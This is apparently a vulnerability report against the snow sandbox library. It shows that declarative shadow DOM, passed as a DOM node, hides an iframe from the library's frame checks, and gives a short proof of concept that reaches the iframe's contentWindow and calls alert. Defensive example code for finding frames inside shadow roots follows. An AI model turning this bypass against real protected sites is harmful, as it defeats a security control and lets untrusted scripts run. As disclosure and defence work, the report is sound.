snow
Snow can be bypassed with declarative shadow DOM passed as object instead of string
When checking if an inserter function contains shadow DOM, the code expects the argument to be a string (the argument is added as innerHTML on a new html tag).
But many of the functions do not operate on strings, so the "checked" HTML becomes something like:
Furthermore, elements inside shadow DOM will not be found when looking for frames using querySelectorAll, so we can just insert shadow DOM (as a DOM node, not string) containing an iframe, and use that:
```js
// Declarative shadow root hosting an iframe; the host element gets id "z".
shadowed = `<o-o id=z><template shadowroot="open"><iframe></iframe></template></o-o>`;
// Parse with shadow roots enabled and append the resulting DOM node (not a string) to the document.
document.documentElement.appendChild(new DOMParser().parseFromString(shadowed, 'text/html', {includeShadowRoots: true}).documentElement);
// The iframe lives inside the shadow root, so a querySelectorAll on the document does not return it.
z.shadowRoot.querySelector('iframe').contentWindow.alert(1);
```
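For the defending side, an added illustration of the second point (this is example code written here, not snow's own scan): a frame search that descends into open shadow roots, which a plain querySelectorAll on the document does not do. It is written against the `tagName` / `children` / `shadowRoot` properties so it runs on real elements and on a constructed stand-in tree; when an inserter receives a DOM node rather than a string, the node itself should be walked this way instead of being stringified. Closed shadow roots expose no `shadowRoot` property and remain invisible to this walk.

```javascript
// Added example, not part of snow: find frames including those hosted
// inside open shadow roots. Works on DOM nodes and on plain objects shaped
// like { tagName, children, shadowRoot } so it can be tested without a browser.
const FRAME_TAGS = new Set(['IFRAME', 'FRAME', 'OBJECT', 'EMBED']);

// Returns [{ node, inShadow }] for every frame-like element under root.
// inShadow is true when the element sits under some shadow root, i.e. a
// light-DOM querySelectorAll('iframe') on root would not return it.
function findFramesDeep(root) {
  const found = [];
  const stack = [{ node: root, inShadow: false }];
  while (stack.length) {
    const { node, inShadow } = stack.pop();
    if (!node) continue;
    if (FRAME_TAGS.has(String(node.tagName || '').toUpperCase())) {
      found.push({ node, inShadow });
    }
    // Open shadow root attached to this host (declarative ones are attached
    // by the parser, so they are reached here rather than via <template>).
    if (node.shadowRoot) stack.push({ node: node.shadowRoot, inShadow: true });
    const kids = node.children || [];
    for (let i = kids.length - 1; i >= 0; i--) stack.push({ node: kids[i], inShadow });
  }
  return found;
}

// True when the subtree hides at least one frame behind a shadow root.
function hidesFrameInShadow(root) {
  return findFramesDeep(root).some((f) => f.inShadow);
}

// Constructed stand-in for the node produced by the report's payload:
// <o-o id=z> hosting an open shadow root that contains an <iframe>.
const SAMPLE_TREE = {
  tagName: 'HTML',
  children: [{
    tagName: 'O-O',
    children: [],
    shadowRoot: { children: [{ tagName: 'IFRAME', children: [] }] },
  }],
};
```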